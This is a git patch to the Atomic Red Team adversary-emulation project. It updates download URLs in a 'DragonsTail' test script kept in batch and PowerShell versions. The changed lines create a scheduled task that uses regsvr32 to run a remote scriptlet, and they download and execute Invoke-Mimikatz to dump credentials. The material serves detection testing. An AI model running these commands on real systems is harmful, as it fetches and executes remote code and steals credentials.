From 818c2ce55dd4ebd43b2f3b47581acf10d502d13a Mon Sep 17 00:00:00 2001
From: Michael Haag <michaelahaag@gmail.com>
Date: Thu, 14 Feb 2019 14:43:31 -0700
Subject: [PATCH] DragonsTail (#458)

Updated URLs to fix #437
---
 ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.bat | 4 ++--
 ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1 | 4 ++--
 2 files changed, 4 insertions(+), 4 deletions(-)

diff --git a/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.bat b/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.bat
index 6e710763..d1596491 100644
--- a/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.bat
+++ b/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.bat
@@ -9,7 +9,7 @@
 :: Technique: Scheduled Task https://attack.mitre.org/wiki/Technique/T1053
 :: Create Scheduled Task With RegSv32 Payload
 
-SCHTASKS /Create /SC MINUTE /TN "Atomic Testing" /TR "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct scrobj.dll" /mo 30
+SCHTASKS /Create /SC MINUTE /TN "Atomic Testing" /TR "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/6965fc15ef872281346d99d5eea952907167dec3/atomics/T1117/RegSvr32.sct scrobj.dll" /mo 30
 
 SCHTASKS /Run /TN "Atomic Testing"
 
@@ -18,7 +18,7 @@ SCHTASKS /Delete /TN "Atomic Testing" /F
 :: Tactics: Execution
 :: Technique: PowerShell https://attack.mitre.org/wiki/Technique/T1086
 
-powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
+powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/module_source/credentials/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
 
 :: Tactics: Defense Evasion
 :: Technique: Timestomp https://attack.mitre.org/wiki/Technique/T1099
diff --git a/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1 b/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1
index 849359a6..f6a11ec9 100644
--- a/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1
+++ b/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1
@@ -9,7 +9,7 @@
 # Technique: Scheduled Task https://attack.mitre.org/wiki/Technique/T1053
 # Create Scheduled Task With RegSv32 Payload
 
-SCHTASKS /Create /SC MINUTE /TN "Atomic Testing" /TR "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct scrobj.dll" /mo 30
+SCHTASKS /Create /SC MINUTE /TN "Atomic Testing" /TR "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/6965fc15ef872281346d99d5eea952907167dec3/atomics/T1117/RegSvr32.sct scrobj.dll" /mo 30
 
 SCHTASKS /Run /TN "Atomic Testing"
 
@@ -18,7 +18,7 @@ SCHTASKS /Delete /TN "Atomic Testing" /F
 # Tactics: Execution
 # Technique: PowerShell https://attack.mitre.org/wiki/Technique/T1086
 
-powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
+powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/module_source/credentials/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
 
 # Tactics: Defense Evasion
 # Technique: Timestomp https://attack.mitre.org/wiki/Technique/T1099